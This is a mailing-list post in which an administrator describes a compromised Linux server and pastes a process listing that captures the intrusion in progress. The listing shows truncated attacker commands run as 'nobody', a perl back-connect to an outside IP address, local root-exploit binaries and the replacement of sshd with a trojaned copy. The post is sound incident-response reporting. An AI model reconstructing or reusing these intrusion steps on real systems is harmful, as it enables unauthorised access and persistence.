This morning my machine was also compromised in a similar fashion as described in your post here.
http://lists.debian.org/debian-security/2005/03/msg00112.html Was the point of entry ever determined? I just happened to log onto my machine while this was taking place. I did a ps and killed everything except non essential processes and mounted a directory tree I had with known good binaries and used those to poke around the machine. I have no idea how they got in, there were a lot of processes running as nobody. I really only run apache as nobody, so that could be the point of entry. I will include the ps listing in the email. I would at least like to know the name of the root kit if anyone has that info. I also saved all the binaries and have a tripwire report of the changed files. Thanks # ps -ef UID PID PPID C STIME TTY TIME CMD root 1 0 0 Jan10 ? 00:00:24 init root 2 1 0 Jan10 ? 00:00:00 [keventd] root 3 0 0 Jan10 ? 00:00:01 [ksoftirqd_CPU0] root 4 0 0 Jan10 ? 00:00:01 [ksoftirqd_CPU1] root 5 0 0 Jan10 ? 00:52:23 [kswapd] root 6 0 0 Jan10 ? 00:23:30 [kreclaimd] root 7 0 0 Jan10 ? 00:06:15 [bdflush] root 8 0 0 Jan10 ? 00:00:59 [kupdated] root 9 1 0 Jan10 ? 00:00:00 [mdrecoveryd] root 17 1 0 Jan10 ? 00:20:19 [kjournald] root 92 1 0 Jan10 ? 00:00:00 [khubd] root 185 1 0 Jan10 ? 00:00:00 [kjournald] root 955 1 0 Jan10 ? 00:00:11 /usr/local/apache/bin/httpd root 1294 1 0 Jan10 ? 00:00:00 [scsi_eh_2] root 1335 1 0 Jan10 ? 00:00:04 crond xfs 1407 1 0 Jan10 ? 00:00:00 xfs -droppriv -daemon root 1471 1 0 Jan10 ? 00:00:00 /usr/local/snmp/sbin/snmpd root 1504 1 0 Jan10 tty1 00:00:00 /sbin/mingetty tty1 root 1505 1 0 Jan10 tty2 00:00:00 /sbin/mingetty tty2 root 1506 1 0 Jan10 tty3 00:00:00 /sbin/mingetty tty3 root 1507 1 0 Jan10 tty4 00:00:00 /sbin/mingetty tty4 root 1508 1 0 Jan10 tty5 00:00:00 /sbin/mingetty tty5 root 1509 1 0 Jan10 tty6 00:00:00 /sbin/mingetty tty6 root 1896 1 0 Jan10 ? 00:23:49 /usr/local/sbin/named root 18348 1 0 Jan10 ? 00:00:00 /usr/local/apache-https/bin/http root 20871 1 0 Jan14 ? 00:00:00 /bin/sh /usr/local/mysql/bin/saf mysql 20899 20871 0 Jan14 ? 00:08:03 /usr/local/mysql/libexec/mysqld mysql 20901 20899 0 Jan14 ? 00:08:03 /usr/local/mysql/libexec/mysqld mysql 20902 20901 0 Jan14 ? 00:09:27 /usr/local/mysql/libexec/mysqld ntp 23268 1 0 May18 ? 00:00:01 ntpd -U ntp root 5487 1 0 Jun20 ? 00:00:09 xinetd -stayalive -reuse -pidfil root 25030 1 0 Jun25 ? 00:00:20 /usr/local/bin/perl /usr/local/p nobody 6057 18348 0 Jul11 ? 00:00:07 /usr/local/apache-https/bin/http nobody 6058 18348 0 Jul11 ? 00:00:10 /usr/local/apache-https/bin/http nobody 6059 18348 0 Jul11 ? 00:00:09 /usr/local/apache-https/bin/http nobody 6060 18348 0 Jul11 ? 00:00:09 /usr/local/apache-https/bin/http nobody 6061 18348 0 Jul11 ? 00:00:07 /usr/local/apache-https/bin/http nobody 6063 18348 0 Jul11 ? 00:00:09 /usr/local/apache-https/bin/http nobody 6068 18348 0 Jul11 ? 00:00:08 /usr/local/apache-https/bin/http bates 24856 1 0 Jul11 ? 00:00:01 ./server_linux -PID=tsserver2.pi bates 24857 24856 0 Jul11 ? 00:00:00 ./server_linux -PID=tsserver2.pi bates 24858 24857 0 Jul11 ? 00:00:01 ./server_linux -PID=tsserver2.pi bates 24859 24857 0 Jul11 ? 00:00:01 ./server_linux -PID=tsserver2.pi bates 24860 24857 0 Jul11 ? 00:00:00 ./server_linux -PID=tsserver2.pi bates 24861 24857 0 Jul11 ? 00:00:00 ./server_linux -PID=tsserver2.pi bates 24862 24857 0 Jul11 ? 00:00:00 ./server_linux -PID=tsserver2.pi bates 24863 24857 0 Jul11 ? 00:00:00 ./server_linux -PID=tsserver2.pi bates 24864 24857 0 Jul11 ? 00:00:00 ./server_linux -PID=tsserver2.pi smmsp 23861 1 0 Jul15 ? 00:00:00 sendmail: Queue [EMAIL PROTECTED]:05:00 root 23878 1 0 Jul15 ? 00:00:05 sendmail: accepting connections root 16095 955 0 Jul18 ? 00:00:00 /usr/local/sbin/cronolog --perio root 16096 955 0 Jul18 ? 00:00:00 /usr/local/sbin/cronolog --perio root 16097 955 0 Jul18 ? 00:00:00 /usr/local/sbin/cronolog --perio root 16098 955 0 Jul18 ? 00:00:09 /usr/local/sbin/cronolog --perio root 16099 955 0 Jul18 ? 00:00:00 /usr/local/sbin/cronolog --perio root 16100 955 0 Jul18 ? 00:00:00 /usr/local/sbin/cronolog --perio nobody 16101 955 0 Jul18 ? 00:07:18 /usr/local/apache/bin/httpd nobody 16102 955 0 Jul18 ? 00:07:01 /usr/local/apache/bin/httpd nobody 16103 955 0 Jul18 ? 00:07:16 /usr/local/apache/bin/httpd nobody 16104 955 0 Jul18 ? 00:07:12 /usr/local/apache/bin/httpd nobody 16105 955 0 Jul18 ? 00:07:23 /usr/local/apache/bin/httpd nobody 16107 955 0 Jul18 ? 00:06:58 /usr/local/apache/bin/httpd nobody 16109 955 0 Jul18 ? 00:07:31 /usr/local/apache/bin/httpd nobody 16110 955 0 Jul18 ? 00:07:42 /usr/local/apache/bin/httpd nobody 16114 955 0 Jul18 ? 00:07:21 /usr/local/apache/bin/httpd nobody 16116 955 0 Jul18 ? 00:07:05 /usr/local/apache/bin/httpd root 371 1 0 03:31 ? 00:00:06 /usr/local/bin/spamd -d -c -a -m root 3665 1 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3692 3665 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3693 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3694 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3695 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3696 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3697 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3698 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3699 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3700 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3701 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3702 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3703 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3704 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3705 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3706 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3707 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3708 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3709 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3710 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3711 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3712 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3713 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3714 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3715 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3716 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3717 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3718 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3719 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3720 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3721 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3722 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3723 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 3724 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/ root 4471 23878 0 06:29 ? 00:00:00 sendmail: ./j6GIV8U9014887 mx00. nobody 4742 1 0 06:39 ? 00:00:00 sh -c echo ;echo b_exp;cd /tmp;r nobody 4745 4742 0 06:39 ? 00:00:00 perl clean 220.228.110.11 2025 nobody 4747 4745 0 06:39 ? 00:00:00 sh -c echo "`uname -a`";echo "`i nobody 4752 4747 0 06:39 ? 00:00:00 /bin/sh nobody 4824 4752 0 06:40 ? 00:00:00 ./ptr3 nobody 4825 4824 0 06:40 ? 00:00:00 [ptr3 <defunct>] nobody 4826 4824 0 06:40 ? 00:00:00 [ptr3 <defunct>] root 4827 4824 0 06:40 ? 00:00:00 [modprobe <defunct>] root 4829 4824 0 06:40 ? 00:00:00 /bin/sh root 4831 1 0 06:40 ? 00:00:00 ./ptr3 root 4858 4829 0 06:41 ? 00:00:00 /bin/sh ./make root 4863 4858 0 06:41 ? 00:00:00 ./inst root 4866 1 0 06:41 ? 00:00:00 chmod 777 conf configure inst li root 4867 4863 0 06:41 ? 00:00:00 /bin/bash ./configure root 4870 4866 0 06:41 ? 00:00:00 [chmod <defunct>] root 4920 1 0 06:41 ? 00:00:00 chmod 755 /usr/local/bin/ssh2 root 4925 4920 0 06:41 ? 00:00:00 [chmod <defunct>] root 4927 1 0 06:41 ? 00:00:00 mv -f sshd /usr/sbin/sshd root 4929 1 0 06:41 ? 00:00:00 chown root.bin /usr/sbin/sshd root 4932 4929 0 06:41 ? 00:00:00 [chown <defunct>] root 4933 4927 0 06:41 ? 00:00:00 [mv <defunct>] root 4940 1 0 06:41 ? 00:00:00 chown root.bin /usr/local/sbin/s root 4950 4940 0 06:41 ? 00:00:00 [chown <defunct>] root 4958 1 0 06:41 ? 00:00:00 hostname -f root 4960 4958 0 06:41 ? 00:00:00 [hostname <defunct>] nobody 4964 1 0 06:42 ? 00:00:00 sh -c echo ;echo b_exp;cd /tmp;r nobody 4967 4964 0 06:42 ? 00:00:00 perl clean 220.228.110.11 2025 nobody 4968 4967 0 06:42 ? 00:00:00 sh -c echo "`uname -a`";echo "`i nobody 4973 4968 0 06:42 ? 00:00:00 /bin/sh nobody 4985 4973 0 06:42 ? 00:00:01 nobody 4996 1 0 06:42 ? 00:00:00 sh -c echo ;echo b_exp;cd /tmp;r nobody 4999 4996 0 06:42 ? 00:00:00 perl clean 220.228.110.11 2025 nobody 5000 4999 0 06:43 ? 00:00:00 sh -c echo "`uname -a`";echo "`i nobody 5005 5000 0 06:43 ? 00:00:00 /bin/sh nobody 5030 5005 0 06:43 ? 00:00:00 ./traci nobody 5031 5030 0 06:43 ? 00:00:00 ./traci nobody 5032 5030 0 06:43 ? 00:00:00 [traci <defunct>] root 5033 5030 0 06:43 ? 00:00:00 [modprobe <defunct>] root 5034 5030 0 06:43 ? 00:00:00 /bin/sh root 5035 5034 0 06:43 ? 00:00:00 ./traci root 5055 23878 0 06:43 ? 00:00:00 sendmail: j6KDhuqh005055 e176012 root 5105 1 0 06:44 ? 00:00:00 minilogd root 5233 1 0 06:46 ? 00:00:00 sendmail: accepting connections root 5260 1 0 06:46 ? 00:00:00 sshd: bates [priv] bates 5264 5260 0 06:46 ? 00:00:00 sshd: [EMAIL PROTECTED]/2 bates 5266 5264 0 06:46 pts/2 00:00:00 -bash root 5423 5266 0 06:47 pts/2 00:00:00 bash root 5562 1 0 06:49 ? 00:00:00 /usr/local/sbin/sshd root 6465 5423 46 06:51 pts/2 00:01:55 tripwire root 6965 5562 0 06:52 ? 00:00:00 sshd: bates [priv] bates 6968 6965 0 06:52 ? 00:00:00 sshd: [EMAIL PROTECTED]/3 bates 6969 6968 0 06:52 pts/3 00:00:00 -bash root 7061 6969 0 06:53 pts/3 00:00:00 bash mysql 7343 20901 0 06:55 ? 00:00:00 /usr/local/mysql/libexec/mysqld root 7344 7061 0 06:55 pts/3 00:00:00 ps -ef -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
